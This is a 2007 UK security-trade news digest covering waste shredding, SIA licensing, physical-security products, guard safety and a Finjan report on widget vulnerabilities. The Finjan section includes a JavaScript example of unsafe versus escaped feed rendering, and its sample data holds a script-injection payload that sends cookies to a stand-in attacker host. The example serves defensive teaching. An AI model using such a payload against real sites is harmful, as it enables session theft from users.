Security Features - October 2007
Tim Thomas, BSIA Director of Legal Services, comments:
“From the 30th Oct 2007, businesses are obliged to minimise
the amount of waste that they send to landfill in order to meet
the new requirements of the Landfill Directive. As a result, the
British Security Industry Association (BSIA) is advising businesses
to review their waste management processes and undertake alternative
methods of disposal such as recycling.”
“Businesses should ensure that their confidential waste
is being disposed of securely, and the BSIA’s Security Waste
Audit is a useful tool in helping businesses to assess this level
of security. In order for businesses to protect themselves against
becoming victims of identity fraud, the Association advises engaging
the services of a BSIA Information Destruction company, which will
not only shred your confidential waste but will also ensure that
any waste that can be recycled is recycled. This means that businesses
can protect themselves from identity theft, fulfil their requirements
under the Data Protection Act, and also comply with the new Landfill
regulations.”
“All BSIA information destruction section members must hold
ISO 9001:2000 accreditation and will be inspected to BS 8470,
the British Standard for the destruction of confidential material,
as part of their ISO accreditation audit procedure. This provides
customers with further peace of mind that their confidential information
is in safe hands and that their legal obligations are fulfilled.”
Selectaglaze enhance window security
Windows have traditionally been seen as “soft targets”
for physical attack and as points of entry for intruders, and they have
provided little protection against bomb blast. Flying glass can
be a major cause of injury to those in buildings that suffer a
bomb blast. Where lives are potentially at stake, or the need to
protect property is critical, products must be fully tested and
certified.
Based on its market-leading secondary glazing systems, Royal
Warrant Holder Selectaglaze has developed a Security Range which
has successfully passed tests for physical resistance, bomb protection,
ballistic protection and 30-minute fire integrity. The units have
been tested to BS7590, meeting the needs of the “Secured
by Design” initiative.
Secondary glazing involves the installation of discreet,
purpose-made windows fitted room-side of the primary window and
is appropriate for staged refurbishment or upgrade plans, with
little disruption to the building or its occupants.
Selectaglaze’s “Window Protection Systems” brochure
contains comprehensive information on all of the company’s
security systems, together with guidance on appropriate levels
of protection for various risk situations and details of the test
standards and certifying bodies. The brochure is available free,
upon request. enquires@selectaglaze.co.uk
or phone 01727 837271/fax: 01727 844053.
www.selectaglaze.co.uk
Success of Approved Contractor Scheme Leads to Reduction in Fees
The Security Industry Authority (SIA) is pleased to announce a
£3 per head reduction in the annual Approved Contractor
Scheme (ACS) registration fee for each licensable employee,
from £20 to £17. The reduction takes effect from 1
October 2007.
The ACS is a non-profit making scheme with the fees set at a break-even
level. Since the launch of the ACS it has proved so popular with
security companies that there are now more Approved Contractors,
employing more licensable staff, than initially projected. This
means the SIA can reduce the annual licensable employee fees by
£3 per head.
Andrew Shephard, SIA Assistant Director, ACS said:
“This is good news for Approved Contractors and helpful
to those companies considering applying to the scheme.
“The Approved Contractor Scheme has been a great success
with more companies than originally forecast seeking and achieving
ACS status. As of today, 378 security companies are approved,
employing more than 90,000 licensable staff - which is approaching
half of the licensable security population in England and Wales.
“ACS fees will be reviewed every year and adjusted again,
if necessary, to ensure that fee income continues to match the
costs of the scheme.”
New SIA Chief Executive
Michael Wilson joins the Security Industry Authority (SIA) as
Chief Executive. He takes over from Andy Drane who was Acting
Chief Executive.
Before joining the SIA, Mike was Chief Executive of the Gangmasters
Licensing Authority, and before that was Chief Executive of the
Defence Vetting Agency.
Speaking about his new role Mike said:
“I am joining an organisation that has an important role
to play in protecting the public by regulating the private security
industry.
“The SIA has accomplished a great deal in a relatively short
period of time. It worked closely with Government and with the
private security industry to draw up a range of security standards.
And today, over 230,000 individuals hold valid SIA licences, more
than 368,000 SIA specified qualifications have been awarded and
378 security companies are Approved Contractors. This is an impressive
achievement that reflects well on the quality and commitment of
all staff.
“I look forward to working with the Directors and staff
of the Authority, the SIA Board, with the private security industry
and with other stakeholders, to build on the SIA’s achievements
to date. I am particularly interested in improving our service
to customers, to ensuring that we minimise any regulatory burden
on the industry, and in showing that the Authority is achieving
the outcomes envisaged in the Private Security Industry Act 2001.”
Mike Wilson was educated at the Duke of York’s School, Nairobi,
Mons Officer Cadet School, the Royal School of Military Engineering
and University College London. Married with three children, his
recreational interests include working dogs, shooting, climbing,
fishing, golf and deer management.
Increased Demand for Security Services in Scotland
Edinburgh-based defence and security consultants Stuart Crawford
Associates (SCA) report a surge in demand for their strategic
security risk assessment service in Scotland since the terrorist
attack on Glasgow Airport in July this year. The attempt to blow
up the departures lounge at the start of the holiday season, dramatically
captured on video by many holidaymakers and shown widely on national
television, has prompted individuals, companies and other organisations
to take a long, hard look at their security arrangements, both
for property and for personnel. Many are not happy with
what they have found and are seeking expert help.
SCA founder Stuart Crawford is not surprised. “Over the
years Scotland has been very fortunate in that it has never suffered
the levels of terrorist related violence which other parts of
the UK have endured. In fact, many people were saying that it
would never happen up here. In contrast, the longer nothing major
happened in Scotland the more likely we at SCA thought it would
happen in the future. Now that the Glasgow attack has taken place,
we can be sure that, sadly, there will be more of the same at
some point.”
He went on: “This has woken a lot of people up out of their
slumbers and they’re having a look at what they have in
place in terms of security arrangements for personnel and property.
A lot are not liking what they’re finding and are coming
to people like us to give them advice and guidance. We are one
of the few, if not the only, credible Scottish based security
consultancy of our type, and for Scottish organisations (and those
in the north of England) we’re relatively inexpensive to
hire as we don’t have the overheads or the travel and accommodation
expenses of our London based rivals.”
SCA operates at what they call the “intellectual end”
of the security sector, using their many combined years of military
training and expertise to advise clients from all sectors on their
security. Much use is made of ex special forces personnel who
are particularly well qualified in this sort of work and are in
essence “poachers turned gamekeepers”.
Further details of SCA’s services can be obtained at their
website at www.swcrawford.co.uk.
SIA and police praise security staff at ‘V’ Festival
A team of investigators from the Security Industry Authority (SIA)
visited the ‘V’ Festival at Hylands Park, Chelmsford
to carry out a number of compliance checks on security operatives
deployed at the event.
The SIA was fully supported by Essex Police, Chelmsford Borough
Council and security providers. Investigators had permission to
enter the site and undertake relevant checks from event organiser
Maztec Ltd.
The team inspected licences and spoke to over 120 individuals
across 24 locations; they found security staff were 100% compliant
with the law.
David Porter, an SIA Head of Investigation, said: “I am very
pleased with the results of the operation. Those requiring SIA
licences were wearing them and were professional whilst undertaking
their duties.”
Bell Security Ltd - ‘Fire UK’ Division Gains LPS 1014 Certification
Fire UK, the fire systems division of Bell Security Ltd, has attained
LPS 1014-certified status. Bell regards this important third-party
recognition of the quality of its installations - from the certifying
audit group BRE, for the LPCB (Loss Prevention Certification Board)
- as the attainment of a further goal in a strategy to help expand
its portfolio of major customers nationwide. Fire UK already holds
BAFE/NSI Fire Gold accreditation and in recent months has made
project wins in the academic, commercial and industrial sectors.
Bell Security - Fire UK Business Support Manager, Lee Merryweather,
said:
"Adding LPS 1014, and therefore now holding dual, third-party
certification of our operations, is a major credibility enhancement
for us in the marketplace. In the light of the 2006 fire safety
legislation, the customer confidence this provides will be a key
business driver."
Lee Merryweather (left) is pictured receiving the company's certification
from LPS 1014 Scheme Manager, Robert Denton.
Visit: www.bellsecurity.co.uk
For further information: Bell Security Ltd Tim Harris tim.harris@bellsecurity.co.uk
Tel: 020 8553 5932
CCTV – Compliance Assistance
The National Security Inspectorate (NSI) advises that all CCTV
systems, with the exception of those used to record images on
private dwellings, must comply with the Data Protection Act 1998.
Compliance is mandatory, and organisations that do not comply risk
penalty fines.
Before a CCTV surveillance system is installed, the purpose of
its intended use needs to be established, and the person(s) or
organisation responsible for the system needs to be documented
and registered with the Information Commissioner’s Office (formerly
the Office of the Data Protection Commissioner).
To comply with the Data Protection Act, consideration must also
be given to the siting of cameras, ensuring that they only cover
the areas that require monitoring. The owners of the system must
consult with the owners of any private dwellings that may be covered
by, or border, the area being monitored by the equipment. Owners
of the system must not adjust the cameras to cover any areas not
covered by the scheme, and the privacy of individuals must be respected
at all times.
Signs must be placed within the area that is monitored in order
to notify the public that they are entering a site that is under
CCTV surveillance. These signs must be clearly visible and legible
and include details of who is responsible for the CCTV system.
Once a system has been purchased and installed it is necessary
to ensure that the CCTV images recorded are of a high quality,
so that they are not rendered useless as evidence. Frequent checks must be
made to ensure that the equipment is performing properly: checking
that there is enough light for the camera to give a clear picture,
ensuring that the recording media is of good quality (where tapes
are still used they must be changed regularly) and that images are
kept for at least a month. However, images must not be retained
for longer than necessary, in order to protect the rights of those
being filmed.
Finally, it is necessary to ensure that only authorised employees
have access to the recorded information, and it is these employees
who carry responsibility for deciding whether images should be
viewed by a third party. Access to CCTV recorded images needs
to be tightly controlled and restricted to comply with the Data
Protection Act, and third parties must be limited to the police,
legal representatives and people whose image has been recorded,
unless they are under investigation.
In order to ensure that your CCTV system is compliant, customers
should always use only those companies approved through officially
recognised third party certification (TPC) bodies.
Paxton Access launches range of ‘designer’ access control readers
Paxton Access, the UK market leader in the design and manufacture
of electronic access control systems has announced the launch
of a new and unique range of internal PROXIMITY Architectural
readers. “Our unique range of new access control readers
is in direct response to requests from architects and designers
for manufacturers to be more imaginative in the design of access
control systems”, says Adam Stroud, Paxton Access Sales
and Marketing Director. “We are anticipating strong demand
from corporate customers for whom design and style is an important
aspect of their built environment.”
A PROXIMITY access control reader is the wall-mounted unit to
which the user presents their proximity token, for instance in
order to unlock a door or raise a barrier. Depending on the technology
in use, this may require the user to present a token to the reader
or simply to have the token carried on their person.
Until now access control readers have been uniform in design,
varying little in shape or size, and offering almost no opportunity
for the customer to exercise choice.
“Our new range of Proximity readers provides architects,
designers and their customers the opportunity to exercise both
choice and control over how their readers look”, explains
Adam Stroud.
Designed to fit discreetly and stylishly into installations where
aesthetics are paramount, the PROXIMITY architectural reader is
manufactured using high quality materials and incorporates three
high intensity LEDs, which show green for access, red for access
denied and white when in standby mode.
The reader consists of two main parts, the reader and the insert.
The initial range comprises three different bezel finishes - brush
chrome, matt black and satin chrome – available with a choice
of three inserts - wood, stone or glass. Furthermore, a template
is available for customers who wish to provide their own insert,
for instance to match precisely an existing wall finish. This
gives limitless possibilities and provides the possibility of
a reader that is truly sympathetic with its environment.
The architectural reader is designed to be partially sunken into
the wall and is fitted using a supplied, bespoke backbox. The
reader is suitable for use with Paxton Access’ Switch2 and
Net2 systems.
More information is available online at www.paxton.co.uk
or by telephoning 0845 838 1716.
Downlight Clever
Recently introduced to ESP’s D-range of CCTV products is
the innovative Down Light Camera (DLC), designed to resemble
a recessed downlight while providing discreet day and night surveillance.
Available in a range of finishes (brass, white, chrome, gun metal)
to complement real downlights in the space, the DLC provides colour
images during the day and mono images at night, using its integral
infra-red illumination. In-built angle adjustment allows the surveillance
area to be precisely defined.
The DLC is a 12vdc camera with standard BNC connections compatible
with all CCTV monitoring systems including of course the ESP D-range
and features a 1/3” Sony HAD CCD image sensor for enhanced
image quality.
Terra Lock Gate: a bi-parting hinged gate
Frontier Pitts’ new Terra Lock Gate has been successfully crash
tested to the BSI standard PAS 68:2007; the Terra Lock Gate stopped
a 7,500kg vehicle travelling at 80 km/h.
The new high security bi parting hinged gate, was successfully
tested by TRL Crash Laboratories.
The Terra Lock Gate remained fully functional after the crash
test.
The test was conducted to prove the arresting capability of the
Terra Lock Gate when impacted by a 7,500kg test vehicle at a
speed of 80 km/h (50mph). In accordance with the PAS 68:2007
specification, which exceeds the US Department of State K12 test
standard, the test vehicle was fitted with test sensors to meet
the demanding standard specifications.
The new Terra Lock Gate is part of the Anti-Terra Series. Other
products in the range include the Terra Blocker, the Terra Bollards,
Terra Gate, Terra Road Closer (swing arm) and the Terra Barrier
(rising arm) which have all been successfully crash tested by
TRL.
On impact the Terra Lock Gate brought the vehicle to a complete
halt, with zero penetration onto site or past the gate leaves.
The cab of the truck was totally crushed. A key feature of the
design ensured that all forward energy was absorbed at the front
of the equipment and into the shallow foundations on impact.
Immediately after the crash, the Terra Lock Gate’s leaves
continued to open and close as normal. Frontier Pitts states that
no other company in the world can offer a product which
can surpass the standards of PAS 68:2007 and continue to
operate immediately after the impact, without needing
repair. The company regards this as a major breakthrough in high-security,
anti-terrorist barricades. The test was witnessed by CPNI (Centre for the Protection
of National Infrastructure), formerly NSAC (National Security
Advice Centre), plus NICC, the UK Government’s advisory body for
security.
Frontier Pitts have developed the Terra Lock Gate to meet the
requirements of their customers at airports, embassies, palaces,
government institutions and military bases around the world. Key
features of the Frontier Pitts crash-rated Terra Lock Gate include
shallow foundation requirements of only 300mm, allowing installation
of the gate even on sites where underground services exist. The
Terra Lock Gate is also easily automated using powerful actuators
from Frontier Pitts extensive range.
The Frontier Pitts crash-rated Terra Lock Gate is available in
widths of up to 6000mm and height of 3000mm, with foundation depth
of only 300mm required. Further details are available at www.frontierpitts.com
or by telephoning +44 (0) 1293 422800.
New RCP 6B Radio Fire System: a wire-free alternative to conventional panels from detectomat
The new wire-free Radio Fire System from detectomat is a unique
alternative to the costs, potential damage and business disruption
associated with installing fire systems in existing buildings,
and an ideal solution for retrofit and refurbishment applications
in small to medium-sized enterprises.
Interconnection of the various fire system components, including
detectors, manual call points, sounders and control panels, which
has traditionally been done with electrical cabling, can now be done
with wire-free radio. Installing cables in existing buildings
has, in the past, meant ugly surface wiring or damage to decorations
caused by the installation of concealed wiring. Installing concealed
wiring is also time consuming and presents access issues and general
disruption to ongoing business. All this meant an unwanted and
unnecessary escalation of costs, which can now be avoided.
Radio as a Fire System communication medium has been available
for many years but at a high cost. Now, the unique RCP 6B system
from detectomat offers a cost-effective wire-free, Radio Fire
Alarm solution as an alternative to hardwired Conventional and
smaller Addressable applications. And as an added benefit the
system utilises detectomat's unique range of Designer cover Smoke
Alarms to complement traditional or modern contemporary interior
designs.
The system comprises a range of battery-operated, self-contained
fire detection and alarm devices, including heat and third-party
certified smoke alarms plus manual call points, sounder beacons
and other fire peripherals. These devices are radio connected
with each other via a fire panel base station, which provides
comprehensive alarm indication and control, including monitoring
of the system network integrity and battery condition.
detectomat describes the RCP 6B as a unique solution within its
application area, and it has been reviewed and well received by a number
of Fire Service and fire industry professionals. For further information call 01579 321750,
email detectomat@leighandersonassociates.com
or visit www.detectomat.com.
Recognising Excellence
Driving up skills across the UK economy has never been more important,
as can be seen by the Government’s multi-million pound advertising
campaign “Our Future. In Our Hands”. At the heart
of most skills development are the many highly innovative training
professionals dedicated to making a difference. In recognition
of their work, Skills for Security will be holding three awards ceremonies
in 2007.
The Annual Awards for England & Wales will be presented at
our conference on 8th November at Kassam Stadium.
The first Annual Awards for Northern Ireland will be presented
at our second conference on 14th November at the Waterfront Hall,
Belfast.
The Annual Awards for Scotland will be presented at our final
conference on 30th November at the Barony Hall in Glasgow.
The judges will be looking for best example case studies that
demonstrate the benefits of a commitment to raising the skills
and professionalism of people in the Security Business Sector
through training and development.
Award Categories
Dedication to Continuing Professional Development
Outstanding Coaching/Mentoring Practice
Most Innovative Training Aid/Product
Outstanding Skills Development Partnership
Best Training Professional
Entries are now closed however for further information visit the
Skills for Security website: www.skillsforsecurity.org.uk
Protecting our People
by Stefan Hay FSyI
With the attention of many firmly focused on the ongoing risk
of terrorism, which remains current due to the recent terrorist attacks
in London and Glasgow and the high-profile arrest of the German-based
terrorist cell planning attacks on Frankfurt airport, other
risks to business, and more importantly to the security operatives
that protect them, such as the rise in the use of prohibited weapons
during incidents of crime, are often neglected. It is, however,
a well-known fact that in recent times there has been a sharp
increase in the frequency and seriousness of physical and violent
attacks on both security operatives and police officers across
the UK.
Violent weapon related attacks and other serious related crimes
against the person, occur at random and are unpredictable, making
it difficult for many businesses to protect their employees against
all risks, but if employees, (and in some cases their families),
feel vulnerable they will not be effective and the business itself
could become compromised.
The fatal wounding of British police officers and security operatives,
the vast majority of whom are unarmed, remains statistically rare,
but some recent cases serve as a reminder of the growing
danger of both jobs. PC Jonathan Henry, killed in Luton, was stabbed
as he responded to a call in the town centre. West Mercia Police,
our local force covering Worcester, also lost one of their own
when PC Richard Gray was shot dead on 6th May while responding
to a domestic incident in Shrewsbury.
In June 2007 a number of CVIT (cash and valuables in transit) operatives were attacked with knives
during robberies across Derbyshire, and 24-year-old commuter Adam
Mapleson was shot in the chest when he came to the aid of a security
officer during an armed robbery in Essex in May.
In March, a student, employed as a security officer at Loughborough
University, was shot three times in the abdomen at an event organised
by the student’s union.
In Dec 2006 Norwich security officer Paul Cavanagh, working in
HMV, was stabbed to death by a 19 year old man and his colleague,
Gavin Levett, working at Boots, and Special PC Ian Gardner were
injured during the same attack in Norwich.
In March 2006 two security guards at the NEC were shot during
a concert. One was shot three times, sustaining injuries to the
face, stomach and foot.
Certainly many more security operatives have been wounded, some
fatally, as a result of the fact that the criminals they encounter
do not hesitate to use the weapons they carry and it is these
deaths and injuries that have, in our opinion, made improved conflict
management and physical intervention skills training, greater
weapons awareness for employees and body armour distribution to
security personnel essential.
It is also worth noting that, with the implementation of the Health
& Safety at Work Act, employers neglect at their peril their
‘duty of care to provide employees protection from harm
in the workplace’ and this includes all employers in the
Security Business Sector. Employers have, therefore, the duty
of ensuring that their employees and dependents feel and stay,
safe and we are continuing to develop a range of appropriate solutions
to help employers provide such peace of mind to their people.
We are pleased to work with a network of specialist training providers
to support key skills development areas. Firstly, we continue
to run the hugely successful Weapons Awareness and Recognition
Training courses in partnership with PS5. We are also currently
compiling a list of people interested in attending the Lorica
Research ‘Body Armour Experience’ course which we
believe will become another essential course in the network portfolio
as, according to scientist and leading body armour developer Digby
Dyke of Lorica, “there is greater risk for the Private Security
Industry of buying, or being issued with, unsuitable or even dangerously
inadequate body armour offering little or no protection at all.
The police service in the UK generally is safer because the Home
Office provides standards for UK police body armour. While not
bound to purchase Home Office approved and qualified body armour,
police services in the UK do bind themselves voluntarily to do
so. It could be very dangerous for them to do otherwise.”
There are no formal standards for body armour for the PSI, nor
yet a specifically relevant watchdog, and one of the consequences
of this is that there are vendors of body armour making exaggerated,
if not knowingly false, claims. According to Digby Dyke: “The
worst case we recently came across was one where body armour vests
were packed with carpet material! In another case, I saw an advertisement
on eBay for ‘the latest technology body armour vest, as
issued to HMF in Afghanistan’. Its protection capability
was described as ‘bullet proof and stab proof and will defeat
rifle fire’. I bought it for £40 and found it to be
a ‘fragmentation’ vest as issued to HMF, not capable
of much more than defending against fragments from grenades and
mortars. It failed every ballistic and stab test that we subjected
it to. I wrote to the vendor telling him who I was and he hastily
returned my £40 with a profuse apology and the explanation
that the wrong vest was sent!” It really is a question of
caveat emptor.
Finally, we have recently teamed up with leading conflict management
training specialist Maybo, under the SAFERwork banner, to provide
a high quality, legally and medically reviewed, Physical Intervention
Trainers Programme. This will enable trainers to deliver the Skills
for Security preferred physical intervention course for employees
in the Security Business Sector. Physical Intervention, however,
will not always be appropriate or safe and SAFERwork also covers
when not to intervene.
As a Skills and Standards Setting Body, we spend a great deal
of time operating at strategic level to support skills development
in the sector developing, for example, all of the National Occupational
Standards and conducting key research projects, but we are also
delighted to have so many key training partners such as PS5, Maybo
and Lorica Research who are delivering practical solutions to
protect those people, who, in return, serve and protect us all.
Finjan reveals new attacks that exploit Widgets and Gadgets are imminent
Web Security Trends Report (Q3 2007) continues Finjan’s tradition of delivering ‘You-Heard-It-Here-First’ information on web security
Finjan Inc., a leader in secure web gateway products, has announced
that seemingly innocent widgets (or gadgets) are exposing computer
users to a whole host of attacks. The findings are one of a number
uncovered by Finjan’s Malicious Code Research Center (MCRC)
and reported in the Web Security Trends Report (Q3 2007), which
reveals that the add-ons that add functions to websites contain
code that is vulnerable to exploitation by hackers and criminals.
Finjan has found that widgets are vulnerable to a breadth of attacks
and can be used to endanger a user’s PC as part of an attacker’s
arsenal. Finjan’s research also suggests that new
attacks that exploit the insecurities of widgets and gadgets are
imminent, and that a revised security model should be explored
in order to keep users protected from such attacks. All types
of widget environments (OS, third-party applications, and web widgets)
were found to have inadequate security models that
allowed malicious widgets to run. In addition, Finjan has found
vulnerable widgets that were already available (some in the default
installation) in the widget environment. These findings have already
prompted Microsoft and Yahoo! to issue security advisories and
patches, and an overhaul of the security models currently used
to host these widgets and gadgets online as well as in the operating
systems that provide them.
“As widgets become common in most modern computing environments,
from operating system to web portals, their significance
from a security standpoint rises,” says Finjan CTO
Yuval Ben-Itzhak. “Vulnerabilities in widgets and gadgets
enable attackers to gain control of user machines, and so widgets should
be developed with security in mind. This attack vector could have
a major impact on the industry, immediately exposing corporations
to a vast array of new security considerations that need to be
dealt with. Organizations require security solutions capable of
coping with such a changing environment, with the ability to analyze
code in real time and detect malicious code appearing in innovative
attack vectors, to provide adequate protection.”
Since major portals such as iGoogle, Live.com and Yahoo! all offer
personalized portals that utilize widgets, the growing popularity
of these cool add-ons is likely to result in their increased use
as an attack vector. Adequate protection from this new attack
vector is dependent upon a major overhaul of the security model
of these environments by the vendors. In the meantime, users are
advised to adhere to the following best practices:
Tips on what you should do to avoid Widget infections
a. Refrain from using non-trusted 3rd party widgets. Widgets and
gadgets should be treated as full blown applications and the use
of unknown and untrusted widgets is highly discouraged.
b. Use caution when using interactive widgets. Widgets that rely
on external feeds such as RSS, weather information, external application
data, etc., may be susceptible to attacks that exploit this trust
by piggybacking a malicious payload on such data.
c. Organizations should enforce a strict policy for their users
on using widgets and widget engines. Since these are not considered
business critical applications, or even productivity enhancers
in some cases, the use of widgets and gadgets by corporate users
should be limited. Additionally, blocking widget and gadget file
types could be enforced at the gateway in order to prevent the
downloading of such mini-applications to the corporate network.
To give an idea of the number of widgets and gadgets available,
there are 3,720 on google.com, 3,197 on apple.com and
3,959 on Facebook.com; many of these applications are already being
used by millions of people, based on information from iGoogle.
All the vulnerabilities described below have been fixed by the
corresponding vendors after being discreetly notified by Finjan.
Windows Vista Contacts Widget Vulnerability. The Windows Vista
operating system comes pre-installed with the “Vista Sidebar”
as a basic component (for all editions of the OS). The Sidebar
contains a few existing widgets that can be used out of the box.
One of these widgets is the Contacts widget, which enables easy
access to contacts stored in the Windows Contacts application
(a native component of Vista). Finjan researchers discovered a vulnerability
in the Contacts widget which enables an attacker to run arbitrary
code on the attacked machine by providing a malformed (albeit
fully usable and completely innocent-looking) contact
object. Simply by being displayed in the
Contacts widget, this contact would run arbitrary code on the local machine
without any user interaction or verification.
Live.com RSS reader vulnerability. Live.com is the new and improved
portal from Microsoft; it enables the user to have a personalized
environment which can be customized to display recent headlines
(RSS feeds), a brief summary of the Hotmail inbox, the local weather forecast,
etc. The Live.com RSS reader widget contained a vulnerability
that allowed an attacker to access privileged information from
the user account while impersonating the user and taking control
of their browser. The vulnerability resulted from unsanitized data
feeds: the items provided by the RSS feed could contain scripting
commands, which the widget rendered as-is.
Yahoo! Widgets Contacts vulnerability Yahoo! provides a widget
engine that can be installed as a 3rd party application and provide
widget functionality for operating systems that do not support
this functionality natively. The Contacts widget in the Yahoo!
widgets engine contained a vulnerability that allowed an attacker
to run arbitrary code if a contact contained unsanitized scripting
commands.
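The Live.com RSS and Yahoo! Contacts cases above share one root cause: data that arrives from an untrusted source (a feed item, a contact record) is written into the widget's markup without being encoded for the context it lands in, so a crafted title or field becomes script running in the portal's origin. The following is an added example written for this article; it is not Finjan's code and not taken from the Live.com or Yahoo! widgets. It shows a minimal feed-item renderer in the unsanitized form beside a hardened form; the feed items, names and URLs in it are constructed for illustration.

```javascript
// Added example (not Finjan's, Microsoft's or Yahoo!'s code): rendering
// untrusted feed items into widget HTML, unsafe and safe variants.

const ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };

// Encode the five characters that can break out of an HTML text node or
// a double-quoted attribute value.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ESCAPES[ch]);
}

// Allow only http(s) links. "javascript:" and "data:" URLs in a feed item
// would otherwise become clickable script, so anything else collapses to "#".
function safeHref(url) {
  const trimmed = String(url).trim();
  return /^https?:\/\//i.test(trimmed) ? trimmed : "#";
}

// VULNERABLE: feed fields are concatenated straight into markup, which is the
// unsanitized-feed pattern the report describes. A feed entry can inject
// script that runs with the portal's cookies and session.
function renderItemUnsafe(item) {
  return `<li><a href="${item.link}">${item.title}</a></li>`;
}

// HARDENED: every untrusted field is encoded for its context (attribute value
// or text node) and links are restricted to http(s) before encoding.
function renderItemSafe(item) {
  return `<li><a href="${escapeHtml(safeHref(item.link))}">${escapeHtml(item.title)}</a></li>`;
}

function renderFeed(items, renderer) {
  return `<ul>${items.map(renderer).join("")}</ul>`;
}

// Detection helper used by the checks below: does the rendered markup still
// contain a raw <script> tag or a javascript: link?
function containsActiveContent(html) {
  return /<script\b/i.test(html) || /href="javascript:/i.test(html);
}

// Constructed sample feed (hypothetical hosts): one benign item and one
// crafted by an attacker to exfiltrate document.cookie.
const SAMPLE_FEED = [
  { title: "Security Features - October 2007", link: "https://example.com/news/1" },
  {
    title: 'Breaking<script>document.location="https://evil.example/?c="+document.cookie</script>',
    link: "javascript:alert(document.cookie)",
  },
];

if (typeof require !== "undefined" && require.main === module) {
  console.log("unsafe:", renderFeed(SAMPLE_FEED, renderItemUnsafe));
  console.log("safe:  ", renderFeed(SAMPLE_FEED, renderItemSafe));
}
```

Escaping on output is the minimum; the same item must be encoded differently if it is later placed in a JavaScript string or a URL query, and a portal that hosts many widgets still needs the environment-level isolation (separate origins or sandboxed frames) the report calls for, because a single widget that forgets to encode exposes every other widget sharing that origin.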
The Web Security Trends Report (Q3 2007) also explores new developments
in financially-focused crimeware with detailed coverage of an
actual Trojan that meticulously and evasively targets financial
institutions in order to gain access to user accounts and perform
financial fraud. In addition, the report sounds the alarm on the
proliferation of crimeware toolkits as the leading attack vector
on the web - elaborating on the predictions about crimeware toolkits
in Finjan’s previous Q2 Report.
“Our latest quarterly Web Security Trends Report continues
our ongoing efforts of delivering you-heard-it-here-first information
regarding emerging trends in the web security industry,”
said Finjan CTO Yuval Ben-Itzhak. “We are pleased to share
MCRC’s important findings during 3Q 2007 with the greater
IT community, including real-world examples of malicious code
and suggestions as to how businesses and other organizations can
protect themselves from the latest web threats.”
New Developments in Financially-Focused Crimeware
The Finjan report also discusses the prevalence of web attacks
employing highly sophisticated Trojan, keylogger, and rootkit
crimeware that targets financial institutions. “Financial
gain is the driving force behind the explosive growth of cybercrime,”
said Ben-Itzhak. “Increasingly, crimeware has a single goal
-- to turn data into money. Crimeware is used to steal valuable
business data that can be monetized in the burgeoning cybercrime
market. Hackers are focusing their efforts on stealing sensitive
corporate, customer, financial and employee data, which can then
be sold online to criminal elements.”